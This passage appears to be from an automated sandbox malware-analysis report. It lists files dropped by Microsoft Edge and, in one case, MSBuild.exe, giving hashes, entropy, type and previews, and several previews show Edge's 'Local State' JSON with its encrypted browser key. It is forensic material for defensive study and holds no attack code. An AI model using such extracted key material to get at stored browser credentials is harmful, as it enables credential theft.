SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GrShaderCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.47693366977411E-4
Encrypted:	false
SSDEEP:	3:LsNl3QKll:Ls3ga
MD5:	9C1328EC35AAAE6DA4AB7772A641B92D
SHA1:	09D17364D9F41149610058B7FA97CA3FFABF1B6E
SHA-256:	7948E3111C6AF723F1C607EA24CC4E5A0B7C11D07E50FFED301DF4E93AE36852
SHA-512:	75D8ED95D1499F3093B3DC64C8377B019358A70548241E8BDBA69EC5F327248CD3AF5C19C5B30DDC46CA60518F06FECEABB4EF1DE2D07B1C0AA4AE84879D454F
Malicious:	false
Preview:	........................................S.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlj:Ls3
MD5:	75B40883F3FFF29B400081AF725B5BBD
SHA1:	9C1261227831EA40EFF3437A18154D364BFA2473
SHA-256:	18002A1F9421ADD5C90520C98DFC5B07E63E60C4C9F6FEF13AE97F082A84ACE2
SHA-512:	276BB07EFFE02F76DBD69D4CDB292D44DD6D30F58DB409C18B29F27DD41A8E215DB82F22D37D9B21F747904D0492789889D36EF48F65D21EEEA252CDC161138D
Malicious:	false
Preview:	............................................./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Temp\TmpUserData\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Temp\TmpUserData\Local State

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF30e78.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF30f72.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF30f82.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\TmpUserData\Local State~RF336a1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6648
Entropy (8bit):	5.799886528185702
Encrypted:	false
SSDEEP:	96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhte4dUONIeTC6XQS0qGqk+Z4uj+rW:Io+The2RUUhH6qRAq1k8SPxVLZ7VTi1
MD5:	90A2F19EEFA47D85E430FE6C5168119E
SHA1:	37891580B150A8ACE11FFD627FBB31A27F23613D
SHA-256:	EB2BD55079C7F57F370274A590904D6816B2888B19EAD691FC316E2E34E6097B
SHA-512:	CA73C269544837779C04CD438FE07171FAF8FC88689D9AD9F3CBAEC3CC92A803F17FE9BB0CEEFC950B10930F079D9ABBB259BE32C8A6BBE7CEE331C2DCCE7E0A
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

C:\Users\user\AppData\Local\Temp\TmpUserData\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.46731661083066856
Encrypted:	false
SSDEEP:	12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
MD5:	E93ACF0820CA08E5A5D2D159729F70E3
SHA1:	2C1A4D4924B9AEC1A796F108607404B000877C5D
SHA-256:	F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
SHA-512:	3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\ShaderCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNleM:Ls3eM
MD5:	ECF792335D958B278DCFCF1DBBA22D52
SHA1:	E07BE5AADF81042C0DD89719479DEEAFA4E5E1E3
SHA-256:	AC792CEE768014C94991AFE9CD4965F2E0F267182D34C5E37A58B9C299CC9373
SHA-512:	07B2C69D7A323CE530241ABF351608A59B7BF1AAE1D14E9B3A901ECC7368A11138B2739EBF43993E0C3C4C78F17F56C235AE537EB2BB31C1FC3FCC51A3F94B6F
Malicious:	false
Preview:	........................................!.i../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\customSynchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.922828737239167
Encrypted:	false
SSDEEP:	3:2NGw+K+:fwZ+
MD5:	7BAAFE811F480ACFCCCEE0D744355C79
SHA1:	24B89AE82313084BB8BBEB9AD98A550F41DF7B27
SHA-256:	D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
SHA-512:	70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
Malicious:	false
Preview:	customSynchronousLookupUris_0

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\customSynchronousLookupUris_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	35302
Entropy (8bit):	7.99333285466604
Encrypted:	true
SSDEEP:	768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
MD5:	0E06E28C3536360DE3486B1A9E5195E8
SHA1:	EB768267F34EC16A6CCD1966DCA4C3C2870268AB
SHA-256:	F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
SHA-512:	45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
Malicious:	false
Preview:	.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-..F.1....g\|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a....6g3..%.gy../{\|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..\|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...\|$....;.k.......8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl........}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\RemoteData\edgeSettings

Download File

